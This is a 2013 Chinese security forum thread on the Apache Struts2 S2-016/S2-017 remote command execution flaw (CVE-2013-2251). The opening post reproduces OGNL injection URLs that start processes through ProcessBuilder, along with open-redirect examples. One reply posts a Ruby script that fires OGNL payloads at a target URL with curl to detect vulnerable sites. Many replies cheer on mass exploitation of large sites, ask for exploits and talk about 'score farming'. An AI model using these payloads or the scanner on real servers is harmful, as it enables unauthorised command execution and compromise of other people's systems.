struts2 最新S2-016-S2-017漏洞通杀struts2所有版本

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 12:29

Struts2这个不争气的家伙。已经无话可说了。

struts2 最新S2-016-S2-017漏洞通杀struts2所有版本

struts2 最新S2-016-S2-017漏洞通杀struts2所有版本

struts2 最新S2-016-S2-017漏洞通杀struts2所有版本

POC来自官方:

http://struts.apache.org/release/2.3.x/docs/s2-016.html

http://struts.apache.org/release/2.3.x/docs/s2-017.html

Proof of concept

In the Struts Blank App, open following URLs.

1.Simple Expression - the parameter names are evaluated as OGNL.

1.

http://host/struts2-blank/example/X.action?action:%25{3*4}

2.

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

1.Command Execution

1.

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

2.

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

3.

http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

--------------------------------------------------

Proof of concept

In the Struts Showcase App, open following URLs.

1.

http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/

2.

http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23

[原帖地址]

相关讨论:

1#

啦绯哥 | 2013-07-17 12:30

秒杀

2#

xsser (十根阳具有长短!!) | 2013-07-17 12:32

客官 要轻点了 疼

3#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 12:33

@xsser 某些大厂商官网都存在漏洞...

4#

xsser (十根阳具有长短!!) | 2013-07-17 12:34

@园长 struts真应该被废弃了!

5#

yexin | 2013-07-17 12:36

前排黄金广告位招租。

6#

z@cx (消失半年,朋友们,半年后见) | 2013-07-17 12:38

园长就等你这个呢,哈哈

7#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 12:39

@xsser Who should read this All Struts 2 developers and users

Impact of vulnerability Remote command execution

Maximum security rating Highly Critical

Recommendation Developers should immediately upgrade to Struts 2.3.15.1

Affected Software Struts 2.0.0 - Struts 2.3.15

Reporter Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE Identifier CVE-2013-2251

还是SpringMvc给力,Struts2也不能说是不能用,要是不用OGNL就好了

8#

0x2b | 2013-07-17 12:41

看来struts框架 太不安全了

9#

he1renyagao | 2013-07-17 12:43

要死一大批了

10#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 13:00

@xsser 我擦wooyun的节奏这么快,有点跟不上节拍了。。

2013-07-17 淘宝某分站最新Struts命令执行漏洞第二枚 0/0 print

2013-07-17 淘宝某分站最新Struts命令执行漏洞一枚 2/2 Finger

11#

GaRY | 2013-07-17 13:00

发个预警吧。可不想又刷wooyun了

12#

萧然 (喜欢一切美的东西·) | 2013-07-17 13:06

又是大量连载的节奏

13#

xsser (十根阳具有长短!!) | 2013-07-17 13:07

@GaRY 已经发预警了 看微博

14#

shine (shield) | 2013-07-17 13:07

struts2没有问题,是OGNL实现的这个对象树功能太牛X了,其实像struts1简单搞个反射实现也就够了!

15#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 13:10

@shine ognl 让s2变成了一个残废,每天都在治病,就是治不好。还不如把那只病脚锯了安个假肢。

16#

灰色轨迹 | 2013-07-17 13:14

struts不出问题就没事 一出问题就死一大堆

17#

Adra1n | 2013-07-17 13:14

预警都发了,这个没必要在提交到乌云了吧。

18#

lucky (一天一洞) | 2013-07-17 13:43

又一场风暴

19#

LeadUrLife | 2013-07-17 13:43

前台刷分已在上演

20#

Anonymous (爱生活-爱妹子- 拒绝搞基) | 2013-07-17 13:47

@网监

21#

x1aoh4i (xssing.pw) | 2013-07-17 13:52

刷分开始

22#

蓝风 (?#知我者謂我心憂 不知我者謂我何求#) | 2013-07-17 13:54

淫荡的一天开始了

23#

Vty | 2013-07-17 14:00

@xsser 发招聘需要赞助费吗?

24#

FallenAngel (Crow) | 2013-07-17 14:15

奇葩玩意儿 废弃了比较好

25#

x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2013-07-17 14:18

晚上回来试下,貌似好多大站中招了?看来好多大站要被日了。

26#

piaoye (123) | 2013-07-17 14:19

发现可以执行。不错

27#

dave | 2013-07-17 14:21

叫牛人构造post 写工具。哈哈

28#

围剿 | 2013-07-17 14:23

求exp

29#

I am XiaoM | 2013-07-17 14:30

成了万人轮的玩意了》。。。

30#

网上邻居 | 2013-07-17 14:31

真快。快成灾区了

31#

烨少 | 2013-07-17 14:38

好多站要沦陷了

32#

混世魔王 (欢迎友情链接26836659.blogcn.COM) | 2013-07-17 14:43

@园长 下次出洞,付费购买。5位数

33#

he1renyagao | 2013-07-17 14:49

这个影响让我的百合服务器沦陷的洞被你们忽略了WooYun: 百合网某分站源码下载导致服务器沦陷

34#

无敌L.t.H (:?门安天京北爱我) | 2013-07-17 14:56

准备试试某处内网,看看有没有洞。

35#

M4sk (爱老婆、爱生活、爱网络、爱基友!) | 2013-07-17 14:59

牛淫 快写工具啊

36#

clozure | 2013-07-17 15:13

1 require 'cgi'
2
3 poc =  CGI.escape("${")
4 poc += CGI.escape("#a_str=new java.lang.String('xxooxxoo'),")
5 poc += CGI.escape("#b_str=new java.lang.String('ooxxooxx'),")
6 poc += CGI.escape("#a_resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),")
7 poc += CGI.escape("#a_resp.getWriter().println(#a_str.concat(#b_str)),")
8 poc += CGI.escape("#a_resp.getWriter().flush(),")
9 poc += CGI.escape("#a_resp.getWriter().close()")
10 poc += CGI.escape("}")
11
12 prefixes = ["action:",
13     "redirect:",
14     "redirectAction:"]
15 prefixes.each do |prefix|
16     new_poc = ARGV[0] + "?" + prefix + poc
17     if /xxooxxooooxxooxx/ =~ `curl -g '#{new_poc}' 2>/dev/null`
18         puts new_poc
19     end
20 end

无损测试版

37#

LauRen | 2013-07-17 15:14

前排位置都没有了?

38#

xiaogui | 2013-07-17 15:17

又被刷屏了。。。。

39#

Nicky (-。-) | 2013-07-17 15:19

@clozure ..直接上链接啊

40#

El4pse | 2013-07-17 15:20

直接上链接啊 +1

41#

hqdvista (...) | 2013-07-17 15:21

@clozure 残疾人大牛厉害死了

42#

hack雪花 | 2013-07-17 15:22

有没有关键字

43#

xsser (十根阳具有长短!!) | 2013-07-17 15:30

@hqdvista 噗嗤

44#

sql | 2013-07-17 15:32

@混世魔王

漏洞又不是他发现的,是官方发出来的。还5位数,钱多人傻啊,真被你雷到了

45#

银冥币 (养成了一个习惯.见框就x,见站就x,我爱X) | 2013-07-17 15:54

无exp........

46#

khjian | 2013-07-17 16:01

求exp

47#

Eric | 2013-07-17 16:02

看起来是又开始了。。

48#

小胖子 (我是小胖子,我为z7y代言!!) | 2013-07-17 16:07

刷都飞起了,哎

49#

Ocean | 2013-07-17 16:10

前50!!插入

50#

ACGT | 2013-07-17 16:40

吓到我了

51#

采飞扬 | 2013-07-17 17:04

刷分已开始,哈哈

52#

7z1 | 2013-07-17 17:06

@园长 园长,求exp o(╯□╰)o

53#

th000 | 2013-07-17 17:13

看着struts就蛋疼。

54#

Z-0ne (一个很懒的人) | 2013-07-17 17:20

又来大姨妈,总让我这种潜水的人不淡定。。。

55#

ACGT | 2013-07-17 17:21

@园长 这个就别放出来了吧,留点门槛吧。。

56#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 17:22

@ACGT 已删,听你的GETSHELL还是不发出来了。

57#

Ivan | 2013-07-17 20:54

Windows的可用么

58#

墨水心_Len | 2013-07-17 22:44

悲催啊!